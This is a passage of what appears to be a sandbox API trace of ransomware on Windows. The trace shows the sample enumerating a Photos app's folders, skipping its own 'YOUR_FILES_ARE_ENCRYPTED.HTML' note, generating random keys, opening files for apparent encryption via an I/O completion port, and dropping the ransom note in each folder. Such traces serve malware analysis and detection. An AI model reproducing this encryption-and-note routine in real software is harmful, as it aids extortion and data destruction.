lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings" [0119.551] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\*" [0119.551] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a885816, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a885816, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x67b05aac, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0119.552] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a885816, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a885816, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x67b05aac, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="..", cAlternateFileName="")) returned 1 [0119.552] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a8abac1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a8abac1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a8abac1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0119.552] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.552] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\roaming.lock") returned 109 [0119.552] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0119.553] lstrlenW (lpString=".lock") returned 5 [0119.553] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0119.553] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a885816, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x2dba5c96, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2dba5c96, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0119.553] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.553] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\settings.dat") returned 109 [0119.553] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0119.553] lstrlenW (lpString=".dat") returned 4 [0119.553] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0119.553] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0119.553] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0119.553] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0119.554] GetProcessHeap () returned 0x600000 [0119.554] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0119.574] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="B2") returned 2 [0119.574] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="20") returned 2 [0119.574] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="42") returned 2 [0119.574] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="19") returned 2 [0119.574] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="4F") returned 2 [0119.574] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="AB") returned 2 [0119.574] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="7E") returned 2 [0119.574] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="80") returned 2 [0119.574] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="0F") returned 2 [0119.574] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="18") returned 2 [0119.574] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="7E") returned 2 [0119.574] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="0E") returned 2 [0119.574] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="0B") returned 2 [0119.574] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="5D") returned 2 [0119.574] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="C7") returned 2 [0119.574] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="89") returned 2 [0119.574] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="DF") returned 2 [0119.574] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="D3") returned 2 [0119.575] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="8F") returned 2 [0119.575] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="86") returned 2 [0119.575] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="83") returned 2 [0119.575] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="8F") returned 2 [0119.575] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="63") returned 2 [0119.575] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="FA") returned 2 [0119.575] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="5B") returned 2 [0119.575] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="B5") returned 2 [0119.575] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="07") returned 2 [0119.575] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="C7") returned 2 [0119.575] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="92") returned 2 [0119.575] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="AF") returned 2 [0119.575] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="5D") returned 2 [0119.575] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="50") returned 2 [0119.576] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\settings.dat" [0119.576] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.577] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0119.577] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x67a6d241, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x67a6d241, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x67a6d241, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0119.577] StrStrIW (lpFirst="settings.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.577] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1") returned 114 [0119.577] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0119.577] lstrlenW (lpString=".LOG1") returned 5 [0119.577] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0119.577] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x67a6d241, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x67a6d241, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x67a6d241, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0119.577] StrStrIW (lpFirst="settings.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.577] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2") returned 114 [0119.580] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0119.580] lstrlenW (lpString=".LOG2") returned 5 [0119.580] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0119.580] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x67a6d241, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x67a6d241, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x67a6d241, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0119.580] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0119.580] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0119.580] GetProcessHeap () returned 0x600000 [0119.580] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.581] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0119.582] WriteFile (in: hFile=0x31c, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.597] CloseHandle (hObject=0x31c) returned 1 [0119.597] GetProcessHeap () returned 0x600000 [0119.597] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.597] GetProcessHeap () returned 0x600000 [0119.597] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.597] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a885816, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a885816, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a885816, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0119.597] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.597] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\SystemAppData") returned 101 [0119.597] GetProcessHeap () returned 0x600000 [0119.597] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.597] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\SystemAppData" [0119.597] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\SystemAppData\\*" [0119.597] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a885816, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a885816, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a885816, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName=".", cAlternateFileName="")) returned 0x626978 [0119.598] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a885816, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a885816, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a885816, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="..", cAlternateFileName="")) returned 1 [0119.598] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a885816, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a885816, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a885816, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="..", cAlternateFileName="")) returned 0 [0119.598] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0119.598] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 131 [0119.598] GetProcessHeap () returned 0x600000 [0119.598] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.599] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0119.600] WriteFile (in: hFile=0x31c, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.602] CloseHandle (hObject=0x31c) returned 1 [0119.602] GetProcessHeap () returned 0x600000 [0119.602] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.602] GetProcessHeap () returned 0x600000 [0119.602] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.602] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a885816, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x2da3edc7, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2da3edc7, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0119.602] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.602] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState") returned 97 [0119.602] GetProcessHeap () returned 0x600000 [0119.602] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.602] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState" [0119.602] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState\\*" [0119.602] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a885816, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x2da3edc7, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2da3edc7, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0119.604] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a885816, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x2da3edc7, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2da3edc7, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="..", cAlternateFileName="")) returned 1 [0119.604] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d5bb6bd, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2d5bb6bd, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2d5bb6bd, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="ShareCache", cAlternateFileName="SHAREC~1")) returned 1 [0119.605] StrStrIW (lpFirst="ShareCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.605] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState\\ShareCache") returned 108 [0119.605] GetProcessHeap () returned 0x600000 [0119.605] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.605] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState\\ShareCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState\\ShareCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState\\ShareCache" [0119.605] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState\\ShareCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState\\ShareCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState\\ShareCache\\*" [0119.605] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState\\ShareCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d5bb6bd, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2d5bb6bd, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2d5bb6bd, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3b50, dwReserved1=0x257c842, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0119.606] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d5bb6bd, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2d5bb6bd, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2d5bb6bd, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3b50, dwReserved1=0x257c842, cFileName="..", cAlternateFileName="")) returned 1 [0119.606] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d5bb6bd, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2d5bb6bd, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2d5bb6bd, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3b50, dwReserved1=0x257c842, cFileName="..", cAlternateFileName="")) returned 0 [0119.606] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0119.606] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState\\ShareCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 138 [0119.606] GetProcessHeap () returned 0x600000 [0119.606] 